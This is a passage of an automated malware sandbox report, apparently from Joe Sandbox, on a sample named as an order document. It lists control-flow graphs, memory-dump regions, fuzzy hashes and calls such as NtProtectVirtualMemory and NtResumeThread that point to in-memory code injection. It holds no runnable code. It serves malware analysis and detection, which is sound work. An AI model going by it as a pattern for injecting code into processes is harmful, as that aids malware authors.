1324 6f28c18-6f28c19 1316->1324 1318->1316 1320->1281 1320->1282 1320->1321 1321->1282 1322->1272 1323->1278 1323->1279 1323->1280 1323->1281 1323->1282 1323->1324 1324->1278 1325->1272 1330 6f28a1b-6f28a23 1328->1330 1331 6f28a18-6f28a19 1328->1331 1329->1328 1334 6f28a29 call 6f28f1b 1330->1334 1335 6f28a29 call 6f28ed8 1330->1335 1331->1330 1332 6f28a2f-6f28a46 1332->1258 1333 6f28a48-6f28a50 1332->1333 1333->1258 1334->1332 1335->1332
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: 68bd9287057a977a6dd03e5b37d9bf5510729c8b74cc03b1d0c78a9d2c33a419
                                                              • Instruction ID: d76f69015a5503d279485e2093b2b472cee26c324e6a553d837ce4c39545a59c
                                                              • Opcode Fuzzy Hash: 68bd9287057a977a6dd03e5b37d9bf5510729c8b74cc03b1d0c78a9d2c33a419
                                                              • Instruction Fuzzy Hash: 0CF10570E05229CFEBA4CF69D844BA9BBF2BF89340F1081AAD41DA7255DB705D88CF41

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1387 6f28687-6f286bb 1389 6f286c2-6f2870f 1387->1389 1390 6f286bd 1387->1390 1393 6f28712-6f28718 1389->1393 1390->1389 1394 6f28721-6f28722 1393->1394 1395 6f2871a 1393->1395 1405 6f2875f-6f2876b 1394->1405 1395->1394 1396 6f28960-6f289a5 1395->1396 1397 6f287b7-6f287e6 1395->1397 1398 6f28724-6f28755 1395->1398 1399 6f28aa4-6f28ab8 1395->1399 1400 6f28a64-6f28a9a 1395->1400 1401 6f28aba-6f28ad7 1395->1401 1402 6f288fb-6f2895b call 6f28040 1395->1402 1403 6f287e8-6f2885d call 6f28040 1395->1403 1404 6f2886e-6f288e8 1395->1404 1395->1405 1406 6f2876c-6f28798 1395->1406 1453 6f289a7-6f289ad 1396->1453 1454 6f289af-6f289b4 1396->1454 1423 6f287a2-6f287a8 1397->1423 1398->1393 1436 6f28757-6f2875d 1398->1436 1409 6f28a52-6f28a58 1399->1409 1400->1409 1435 6f28a9c-6f28aa2 1400->1435 1420 6f28b3b 1401->1420 1421 6f28ad9-6f28aed 1401->1421 1402->1423 1403->1423 1473 6f28863-6f28869 1403->1473 1404->1423 1476 6f288ee-6f288f6 1404->1476 1406->1423 1424 6f2879a-6f287a0 1406->1424 1413 6f28a61-6f28a62 1409->1413 1414 6f28a5a 1409->1414 1413->1399 1414->1399 1414->1400 1414->1401 1414->1413 1425 6f28bb3 1414->1425 1426 6f28bb0-6f28bb1 1414->1426 1427 6f28b3a 1414->1427 1428 6f28b9a-6f28bae 1414->1428 1429 6f28c1b-6f28c1c 1414->1429 1430 6f28c5b 1414->1430 1431 6f28c1e-6f28c4c 1414->1431 1432 6f28d04-6f28d05 1414->1432 1433 6f28cca-6f28cf5 1414->1433 1434 6f28b09-6f28b2e 1414->1434 1446 6f28b88-6f28b8e 1420->1446 1437 6f28af7-6f28afd 1421->1437 1438 6f28aef-6f28af5 1421->1438 1441 6f287b1-6f287b2 1423->1441 1442 6f287aa 1423->1442 1424->1423 1448 6f28bb4 1425->1448 1426->1448 1427->1420 1428->1446 1450 6f28c5c 1429->1450 1430->1450 1467 6f28c06-6f28c0f 1431->1467 1469 6f28c4e-6f28c59 1431->1469 1465 6f28d06 1432->1465 1460 6f28cf7-6f28d02 1433->1460 1461 6f28cb5-6f28cbe 1433->1461 1434->1437 1462 6f28b30-6f28b38 1434->1462 1435->1409 1436->1393 1439 6f28b06-6f28b07 1437->1439 1440 6f28aff 1437->1440 1438->1437 1439->1434 1440->1425 1440->1426 1440->1427 1440->1428 1440->1429 1440->1430 1440->1431 1440->1432 1440->1433 1440->1434 1440->1439 1441->1402 1442->1396 1442->1397 1442->1399 1442->1400 1442->1401 1442->1402 1442->1403 1442->1404 1442->1427 1442->1434 1442->1441 1456 6f28b90 1446->1456 1457 6f28b97-6f28b98 1446->1457 1448->1467 1450->1461 1453->1454 1463 6f289b6-6f289b7 1454->1463 1464 6f289b9-6f28a07 1454->1464 1456->1425 1456->1426 1456->1428 1456->1429 1456->1430 1456->1431 1456->1432 1456->1433 1456->1457 1457->1428 1460->1461 1471 6f28cc0 1461->1471 1472 6f28cc7-6f28cc8 1461->1472 1462->1437 1463->1464 1479 6f28a11-6f28a16 1464->1479 1480 6f28a09-6f28a0f 1464->1480 1465->1465 1474 6f28c11 1467->1474 1475 6f28c18-6f28c19 1467->1475 1469->1467 1471->1432 1471->1433 1471->1472 1472->1433 1473->1423 1474->1429 1474->1430 1474->1431 1474->1432 1474->1433 1474->1475 1475->1429 1476->1423 1481 6f28a1b-6f28a23 1479->1481 1482 6f28a18-6f28a19 1479->1482 1480->1479 1485 6f28a29 call 6f28f1b 1481->1485 1486 6f28a29 call 6f28ed8 1481->1486 1482->1481 1483 6f28a2f-6f28a46 1483->1409 1484 6f28a48-6f28a50 1483->1484 1484->1409 1485->1483 1486->1483
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410303773.0000000006F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f20000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: y-3|
                                                              • API String ID: 0-2856238494
                                                              • Opcode ID: acbfe229c53a5fd33d60850ee9b5176074eef7cf0e7c0f2f25bb901f0725adb4
                                                              • Instruction ID: f7ca9159f6effaabbda1395e382387c85774cf32e6e27636fc9890b42836910c
                                                              • Opcode Fuzzy Hash: acbfe229c53a5fd33d60850ee9b5176074eef7cf0e7c0f2f25bb901f0725adb4
                                                              • Instruction Fuzzy Hash: B1F1E474E01229CFEBA4CF69D844B99BBF2BF89340F1081AAD419A7355DB745D88CF41
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06F17469
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: f6c3e3226915bb711ce81f0a70a2dca5da3d0750981687605b6e0c85747b46fd
                                                              • Instruction ID: 0ab7780320c443b28c04aafed12e4157a4439aa900e158acae85b55527f0970e
                                                              • Opcode Fuzzy Hash: f6c3e3226915bb711ce81f0a70a2dca5da3d0750981687605b6e0c85747b46fd
                                                              • Instruction Fuzzy Hash: FB2122B1D013499FDB10DFAAD880ADEFBF5FF48310F24842AE519A7240C775AA14CBA1
                                                              APIs
                                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 06F17469
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID:
                                                              • API String ID: 2706961497-0
                                                              • Opcode ID: fd5fb8dc797410cea68f28443fca2f5c128b9d986e55498eeca0ac5a4f40f524
                                                              • Instruction ID: a191470c58575bd5e7dbbd5548688b03ac92aacd032cc4c42bc46a3dc1f23aa1
                                                              • Opcode Fuzzy Hash: fd5fb8dc797410cea68f28443fca2f5c128b9d986e55498eeca0ac5a4f40f524
                                                              • Instruction Fuzzy Hash: CE21FFB1D003499FDB10DFAAD884ADEFBF5FF48310F24842AE519A7240C775A904CBA1
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06F18426
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 8fac7667db6a4d9c8009bcd152ce8e512a4fb3392a92cd9c03cd19f6f9c663f9
                                                              • Instruction ID: 9b5cbcc7d4f744ad876623ce4ae82a006b9dce5644b4330615d4d2379cd8fcb9
                                                              • Opcode Fuzzy Hash: 8fac7667db6a4d9c8009bcd152ce8e512a4fb3392a92cd9c03cd19f6f9c663f9
                                                              • Instruction Fuzzy Hash: B11136B1D003098FDB10DFAAC4847EEFBF4BF88250F54842AD559A7240CB796945CFA5
                                                              APIs
                                                              • NtResumeThread.NTDLL(?,?), ref: 06F18426
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 67bc7cfd61214d50575e576b9dd64103c28c12686cc5786048d646908f892a83
                                                              • Instruction ID: 18875da397ae2208d72d3e6583a4e2ea6a97005e9c6eae64e7fa594f336dd908
                                                              • Opcode Fuzzy Hash: 67bc7cfd61214d50575e576b9dd64103c28c12686cc5786048d646908f892a83
                                                              • Instruction Fuzzy Hash: 191103B1D003098FDB10DFAAC4847AEFBF8BF48210F54842AD419A7240CB79A944CFA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N)
                                                              • API String ID: 0-4241560727
                                                              • Opcode ID: 3729ea424be42c5ca27e88c907352911a199e725f6097902a729ddc9655647ef
                                                              • Instruction ID: 600092dbb3821fa7e3ace09bbcebec4d7facd6bc971082ef86ea12be7f1cf2f9
                                                              • Opcode Fuzzy Hash: 3729ea424be42c5ca27e88c907352911a199e725f6097902a729ddc9655647ef
                                                              • Instruction Fuzzy Hash: 0EB1F070E06218CFEB54CFA9D858BADBBF2BB49340F1091A9D409AB291CB755E85CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N)
                                                              • API String ID: 0-4241560727
                                                              • Opcode ID: af09626fea246e917a0e9446291590849026c935ebd6a46e314cbba3c3d742ec
                                                              • Instruction ID: c18856ca5bd321ff5c51d79cc54394e16dfbe8844a874fad3c31da6c9284fadc
                                                              • Opcode Fuzzy Hash: af09626fea246e917a0e9446291590849026c935ebd6a46e314cbba3c3d742ec
                                                              • Instruction Fuzzy Hash: EBB1F270E06318CFEB54CFA9D858BADBBF2BB49340F1091A9D409AB291CB755E85CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: !
                                                              • API String ID: 0-2657877971
                                                              • Opcode ID: 4bda84f00fbb4851e5402442b6cafc8c6fe80509286b90ce4bb9aff359e9cdcc
                                                              • Instruction ID: 070909a632cadf7ca8f8eacb38d46c66d800a5b38fbaaf78a9e1347f9b4d48e5
                                                              • Opcode Fuzzy Hash: 4bda84f00fbb4851e5402442b6cafc8c6fe80509286b90ce4bb9aff359e9cdcc
                                                              • Instruction Fuzzy Hash: A0C1E674A45228CFDBA4DF18D898BE9B7F2BF49300F1081E9D509A7261DB719E81CF45
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: N)
                                                              • API String ID: 0-4241560727
                                                              • Opcode ID: e074507914b9fbc8c0fe244a9897ebd7f65b52bac22a616db13df3d09a64753c
                                                              • Instruction ID: f1f7b8be76c61a14ece93a39d732fe236b2c1a47d0595b11c16c7b0cd457c3bf
                                                              • Opcode Fuzzy Hash: e074507914b9fbc8c0fe244a9897ebd7f65b52bac22a616db13df3d09a64753c
                                                              • Instruction Fuzzy Hash: DAB1E274E06218CFEB54DFA8D848BADBBF2FB49340F1091A9D409AB291CB755E85CF41
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410262864.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f10000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: h
                                                              • API String ID: 0-2439710439
                                                              • Opcode ID: c933e2263d965e798154b5c74bf5a56b9d65c8b27d693ed5a9f72ea9597cdd40
                                                              • Instruction ID: 67903ae5bcc9d52f7d56875e3dad4268715f3e0e3e668420052214bcff54513b
                                                              • Opcode Fuzzy Hash: c933e2263d965e798154b5c74bf5a56b9d65c8b27d693ed5a9f72ea9597cdd40
                                                              • Instruction Fuzzy Hash: FF61C571D016298BEB64DF6AC850BD9BBF2BF89310F14C2AAD50DB7250DB305A85CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa01828ab78a000ce027c964f0df294a6435f2e981dfd9fa7d7d073b5108a2e5
                                                              • Instruction ID: 689a2ca9bad02720dde050d98125e8342716085b9acd824110381d694140bf9b
                                                              • Opcode Fuzzy Hash: fa01828ab78a000ce027c964f0df294a6435f2e981dfd9fa7d7d073b5108a2e5
                                                              • Instruction Fuzzy Hash: 68A29375A00228DFDB65DF69C984AD9BBB2FF89300F1581E9D509AB321DB319E81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4226fc885f52aba6a61f3af7290e2cb994253c8ac8bd17fadaa3dcec906c3c80
                                                              • Instruction ID: a7e1ce5a43f7493ceb54da5f154d0b09e9eb482280dfea695e8bc57535573058
                                                              • Opcode Fuzzy Hash: 4226fc885f52aba6a61f3af7290e2cb994253c8ac8bd17fadaa3dcec906c3c80
                                                              • Instruction Fuzzy Hash: F0427870E047158FDB58DFAAC494B6EBBF2BF88300F248529D59AD7390DB30A941CB91
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1f398eb68adc65278873f2df64cf5ccba7d0ae9d6d776e796ab62d56c9d20d02
                                                              • Instruction ID: 3bec3e5bcb6562b576ab1cb86796c30c4545e20c22b9687d196a839e6988a5be
                                                              • Opcode Fuzzy Hash: 1f398eb68adc65278873f2df64cf5ccba7d0ae9d6d776e796ab62d56c9d20d02
                                                              • Instruction Fuzzy Hash: 0C329F74A442298FDBA5DF28D984BA9B7B6FF48300F1081E9D94DA7355DB30AE81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1389579730.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_30b0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: acc11ec2e9ac0cbc6c55813fb5c1d6f099dab1957b543c4c48c46f20ac7b1b9e
                                                              • Instruction ID: ab5c728cd21aae7d4f9b8e4931932eafdcc9b5c3f93f4472d19844170b00a877
                                                              • Opcode Fuzzy Hash: acc11ec2e9ac0cbc6c55813fb5c1d6f099dab1957b543c4c48c46f20ac7b1b9e
                                                              • Instruction Fuzzy Hash: 1F1273B04037458EE320EF65ED4C1897BF1BB86319B905209DE612B2EDDBBC156ACF64
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 642917f31c51b0f166ace167e311108c9a006db17057571c1b62dc82131e730f
                                                              • Instruction ID: a774f00a90eed51b28efe078db9afb45950e6050a0d2a4fb30a8ac3c62d8297f
                                                              • Opcode Fuzzy Hash: 642917f31c51b0f166ace167e311108c9a006db17057571c1b62dc82131e730f
                                                              • Instruction Fuzzy Hash: F0E11474E00218CFDB94DFA9D848BAEBBF2FF49300F108169D509AB255DB785985CF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60a27ae9b8d7649fc683b555fcfafab90d5fba846264224185c26b4f2bff8e86
                                                              • Instruction ID: 2992f5fc2d8f15b900c06c63c9ae1cde76dd13c3eeb81400c7708724aa4d0c1c
                                                              • Opcode Fuzzy Hash: 60a27ae9b8d7649fc683b555fcfafab90d5fba846264224185c26b4f2bff8e86
                                                              • Instruction Fuzzy Hash: ADE10474E00218CFDB94DFA9D848BAEBBF2FF49310F108169D509AB255DB785985CF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410817108.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c9e06558cb393aa7c7d2a334c5780a3750048404e3a09009f505dad3a4ec466b
                                                              • Instruction ID: c00f53ab016bca4d87ac0fcdaca02065babf02e169fc76145feaa6d231ca7065
                                                              • Opcode Fuzzy Hash: c9e06558cb393aa7c7d2a334c5780a3750048404e3a09009f505dad3a4ec466b
                                                              • Instruction Fuzzy Hash: 72D1A274A10218CFDB58DFA9D994A9DBBB2FF88300F1081A9D409AB365DB75AD81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa39668325247f229d7bc9fda98085bb0b5daeb5d824b83aa63cfa3a1292b513
                                                              • Instruction ID: 5eb0ac57e498ac0d7b674f753bc840247c5f6c3b0aca13f4f985a021825bf169
                                                              • Opcode Fuzzy Hash: fa39668325247f229d7bc9fda98085bb0b5daeb5d824b83aa63cfa3a1292b513
                                                              • Instruction Fuzzy Hash: 22C10174E11218CFDBA4DF69D884BAEBBF2BF89304F109169D519A7261DB305E81CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 227a6e3bc23ada3cca5b98a97cdf27f37b175bbcb548b1931c3a480827539f05
                                                              • Instruction ID: 9f4ef84fa8853f295b856d0801b5b81dd922c8382e515b0313fb303341c6b586
                                                              • Opcode Fuzzy Hash: 227a6e3bc23ada3cca5b98a97cdf27f37b175bbcb548b1931c3a480827539f05
                                                              • Instruction Fuzzy Hash: A0B11870D06229CFEB54CFA9D948BADBBF2FF4A305F10816AD409AB251DB745985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6c97e416dc57a82f6ab6defec548796e26b574267dbf98c041ef5075df72dc0
                                                              • Instruction ID: 4bc931c78d305107c729d471d66da7a3a409afb5d4e6bb46c29684b5bf5ae18e
                                                              • Opcode Fuzzy Hash: a6c97e416dc57a82f6ab6defec548796e26b574267dbf98c041ef5075df72dc0
                                                              • Instruction Fuzzy Hash: D3C10174E11218CFDB94DF69D884BAEBBF2BF89304F109169D519A7262DB305D81CF80
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8f1355fbeb6bec2ec11c74292d93d50c9315f350d42511ff2da38a3c324829d6
                                                              • Instruction ID: c11544a789abacec1b2aae710ed6e773d2ce1688d23924ca12a7d3ce26949235
                                                              • Opcode Fuzzy Hash: 8f1355fbeb6bec2ec11c74292d93d50c9315f350d42511ff2da38a3c324829d6
                                                              • Instruction Fuzzy Hash: D1B107B0D06229CFEB54CFA9D948BADBBF2FF49305F20816AD409AB251DB745985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1409705268.0000000006DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DD0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6dd0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3b128868d7845be6c24e44db602c74930a62d03b84d214cb33fc7ec3c9244f49
                                                              • Instruction ID: aac298ae6cd1792e4366098c309767e1e50d10a129d59a991400d982151ce2b3
                                                              • Opcode Fuzzy Hash: 3b128868d7845be6c24e44db602c74930a62d03b84d214cb33fc7ec3c9244f49
                                                              • Instruction Fuzzy Hash: CCA1F674E05218CFEB94EFA9D844BADBBF2BF89300F108169D509AB355EB709985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92695569ac0ce74a3ee4aba55f9ff4f303d9ca8f481cbf65c25fe1d422a832d0
                                                              • Instruction ID: 924b3456a3b3b16780152f06fc98e90b8c186919aa2f109acbe2a753968007c9
                                                              • Opcode Fuzzy Hash: 92695569ac0ce74a3ee4aba55f9ff4f303d9ca8f481cbf65c25fe1d422a832d0
                                                              • Instruction Fuzzy Hash: 08A1E870D06229CFEB54CFA9D948BADBBF2FF49305F20816AD40AAB251DB745985CF40
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: df4f21b3b9025fe7b8d56ae9463b7cf0a8fe12f30a216226f3a8325582904d3b
                                                              • Instruction ID: 6715197ed4aed21cf4e0cfaf2c5083c0ddd7aa4508503b400da1d4f4786ddb59
                                                              • Opcode Fuzzy Hash: df4f21b3b9025fe7b8d56ae9463b7cf0a8fe12f30a216226f3a8325582904d3b
                                                              • Instruction Fuzzy Hash: BC511374E05228CFEB94DFA9D8847EDBBF6BF8A301F10912AD409A7244D7745885CF84
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410356007.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6f30000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c37c25cf5af187510e852066ee0cea245f69671d983e2b4ec647788ca516455
                                                              • Instruction ID: 70de7b934a5f934d6e9fbfe910616ddaffb49fdabb0e50eebf26e622daa0fe3a
                                                              • Opcode Fuzzy Hash: 1c37c25cf5af187510e852066ee0cea245f69671d983e2b4ec647788ca516455
                                                              • Instruction Fuzzy Hash: 7F511F75E05228CFEB94DFA9E8846EDFBF6BF9A300F10912AD409A7244D7745885CF84

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 23 6ff6ed7-6ff6edb 24 6ff71da-6ff7241 23->24 25 6ff6ee1-6ff6eeb 23->25 32 6ff7244 call 6f180b8 24->32 33 6ff7244 call 6f18108 24->33 25->24 30 6ff7246-6ff7256 31 6ff7260 30->31 31->31 32->30 33->30
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0$>
                                                              • API String ID: 0-3953377423
                                                              • Opcode ID: 2f0856ad16f36d32b85ce14811ea55777487d01c9d8610093279c57a5ac32123
                                                              • Instruction ID: 86cee01b6716e2c19f09535e97b5fd68c1735c6ff7096e9f7c9742be9b4711c5
                                                              • Opcode Fuzzy Hash: 2f0856ad16f36d32b85ce14811ea55777487d01c9d8610093279c57a5ac32123
                                                              • Instruction Fuzzy Hash: 6B018C74A112289FEBA5DF54DCA4BACBBB1BF49304F1081D9D50DAB2A0DB716E85CF40

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 34 6ff71a3-6ff71a7 35 6ff71ad-6ff71ae 34->35 36 6ff6cf3-6ff6d00 34->36 39 6ff6d06 call 6ff8deb 36->39 40 6ff6d06 call 6ff8df8 36->40 38 6ff6d0c-6ff6d26 39->38 40->38
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1410653896.0000000006FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff0000_GEFA-Order 232343-68983689.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 2$6
                                                              • API String ID: 0-3875314899
                                                              • Opcode ID: a65c224f1fe09c03a18f9687f8a6ee6ac1ca2ccc6bdc5896980090588d85ce3a
                                                              • Instruction ID: a7123b8b91855e28034800fb8f9738c4f19b0129107b93be726d026f1c47a691
